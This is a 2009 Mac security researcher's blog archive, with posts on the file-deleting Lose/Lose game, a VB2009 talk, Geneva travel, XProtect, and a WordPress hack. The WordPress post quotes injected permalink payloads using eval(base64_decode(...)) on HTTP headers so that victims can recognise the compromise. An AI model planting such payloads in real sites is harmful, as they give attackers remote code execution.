Archive

Archive for the ‘Daily Thoughts’ Category

Have you played Lose/Lose?

LoseLose

As the author describes “Lose/Lose is a video-game with real life consequences.”

This game works only in Mac, and as the warning explains, this game deletes files whenever the player kill those aliens. Yes, it is interesting but unfortunately it poses serious threat to users.

So, if you’ll happen to see this screen, I advise you to immediately quit the application (Command + Q) before it’s too late!

VB2009

September 25, 2009 1 comment

I should have posted this content here as well.

So, the presentation has a different twist on what I have wrote in the whitepaper. I started building the understanding about Mac security in my introduction, as I lead the context to analysis at the specific threat families. Then followed by taking the macro analysis by broadening the perspective into attackers’ underlying business models, the competitive advantages it brings while constructing the means, motive and how these aspects build and created opportunity that enables these organize group to perform and deploy threats and attacks to Mac users.

While the momentum of interest and excitement increases, my presentation suddenly froze and crash report pops-up.  Indeed, an ice breaker as I continue to deliver the remaining slides.

At the end, the presentation shared some actual infection report and showed data how successful these threat into penetrating in this platform.

It was a great experience and same time meeting fellow researchers in this conference!

Greetings from Geneva!

Jet d'eau

Jet d’eau (Water Fountain) as taken this morning. It was hot and sunny here in Geneva, so it’s best time to walk around, take some pictures and chill out after taking a good rest and recovering from long trip from Melbourne.

St. Pierre Cathedral

St. Pierre Cathedral is a cathedral in Geneva, Switzerland, belonging to the Swiss Reformed Church.

Wor{d|m}press

It’s really tedious job to update and perhaps, patching from time to time. I should say, security comes with a great responsibility just like parking your car in a right place or locking your valuable computer when leaving.

Last week, users using older version of WordPress noticed unusual strings added to their blogs permalinks which makes a blog post link don’t work.

journeyetc.com responded and describe the attack:

“If you use wordpress, you should check ASAP your blog’s permalinks/rss feed.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.”

Affected users now faces the dilemma of upgrading and cleaning-up. The SQL injection attack leaves a backdoor in which even upgrading, may allow remote attacker to get in.  I recommend further reading to this post, “Old WordPress versions under attack” by Lorelle.

About XProtect

A very good information about Snow Leopard malware protection, its capability and limitation: 

Snow Leopard malware protection system: What does XProtect do?

Categories: Daily Thoughts Tags:

Snow Leopard includes malware protection

An interesting news (it’s now all over the net) – Snow Leopard includes malware protection that detects two known threats, RSPlug and iServices. (Intego first spotted this anti-malware feature.)

Now curious thoughts buzzing around, many suspects that Apple is using ClamAV although Ryan Naraine @ zdnet blog had confirmed that Apple is not using it. Others suggest that it might be using Symantec’s engine, because of the naming convention used “OSX.RSPlug.A, OSX.iService.A”.

Anyway, in a perspective, it seems Apple is taking no chances with emerging and prevalent threats in Mac (as noted in recent changes). It is taking steps forward to deliver protection and exercise due care – which is good.

“Due care is care that a reasonable man would exercise under the circumstances”

At the end of the day, security is a process, which lives and deals with reality – our day to day computing activities.

Security researches, findings and awareness provides avenue for a better understanding of these (impending) attacks or threats.

Am I infected?

I love reading emails especially when with background =) 

userreport

If you just double click it, then you are not infected. However, if you follow and successfully finish the installation process. Then, you are definitely infected!